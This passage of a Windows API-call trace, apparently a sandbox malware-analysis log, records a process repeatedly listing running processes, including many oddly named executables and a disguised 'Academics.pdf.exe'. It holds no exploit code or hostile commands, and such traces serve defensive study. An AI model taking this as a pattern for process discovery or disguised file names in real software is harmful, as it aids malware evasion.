wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0294.377] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0294.377] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0294.379] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0294.380] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0294.381] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0294.381] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0294.382] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0294.383] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0294.384] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0294.385] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0294.386] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0294.386] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0294.387] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.389] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.389] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.390] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.391] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.392] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0294.393] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.394] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.395] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0294.395] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0294.396] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0294.397] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0294.398] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.399] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0294.400] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0294.400] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0294.401] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0294.402] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0294.403] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0294.404] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0294.405] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0294.405] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0294.406] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0294.407] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0294.408] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0294.409] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0294.410] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0294.411] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0294.412] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0294.413] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0294.413] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0294.414] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0294.415] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0294.416] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.417] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0294.418] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.419] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0294.420] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0294.420] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0294.421] CloseHandle (hObject=0x294) returned 1 [0294.421] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 1 [0294.421] TranslateMessage (lpMsg=0x8bf970) returned 0 [0294.422] DispatchMessageW (lpMsg=0x8bf970) returned 0x0 [0294.422] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0294.422] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0294.422] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0294.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0294.422] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0294.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0294.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0294.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0294.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0294.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0294.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0294.422] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0294.425] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0294.426] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0294.426] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0294.427] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0294.428] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0294.429] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0294.430] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0294.431] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0294.432] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0294.432] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0294.433] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.434] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.435] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.436] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.437] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.439] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0294.440] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.441] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.442] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0294.443] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0294.444] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0294.445] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0294.445] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.446] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0294.447] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0294.448] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0294.449] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0294.450] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0294.451] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 